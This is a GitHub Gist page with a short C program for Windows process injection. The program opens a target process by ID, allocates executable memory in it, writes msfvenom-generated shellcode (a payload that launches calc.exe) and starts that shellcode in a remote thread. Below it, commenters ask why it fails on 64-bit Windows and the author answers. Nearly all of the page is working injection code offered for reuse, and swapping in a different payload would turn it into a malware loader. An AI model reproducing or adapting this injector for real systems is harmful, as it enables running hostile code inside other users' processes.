Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#include <windows.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv){
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode
int process_id = atoi(argv[1]);
char shellcode[] = \
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
HANDLE process_handle;
DWORD pointer_after_allocated;
process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
if (process_handle==NULL)
{
puts("[-]Error while open the process\n");
}else{
puts("[+] Process Opened sucessfully\n");
}
pointer_after_allocated = VirtualAllocEx(process_handle, NULL , sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(pointer_after_allocated==NULL){
puts("[-]Error while get the base address to write\n");
}else{
printf("[+]Got the address to write 0x%x\n", pointer_after_allocated);
}
if(WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, (LPCVOID)shellcode, sizeof(shellcode), 0)){
puts("[+]Injected\n");
puts("[+]Running the shellcode as new thread !\n");
//CreateRemoteThread(process_handle, NULL, 0, pointer_after_allocated, NULL, 0, );
CreateRemoteThread(process_handle, NULL, 100,(LPTHREAD_START_ROUTINE)pointer_after_allocated, NULL, NULL, 0x50002);
}else{
puts("Not Injected\n");
}
}
@hasasnh

This comment has been minimized.

Copy link

hasasnh commented Mar 16, 2019

Hello Did you tested this code on windows 10 64 bit cause it's not working with me , the code is not runing the calc

image

@mhaskar

This comment has been minimized.

Copy link
Owner Author

mhaskar commented Mar 19, 2019

@hasasnh : Yes I already tested it on windows 10 x64 bit , please note that you need to compile the code using x64 bit compiler and use a x64 bit shellcode to get it executed correctly

@Ch4rk3es

This comment has been minimized.

Copy link

Ch4rk3es commented May 5, 2020

image
hello , why the code generate this error ? Conversion from LPVOID to DWORD

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.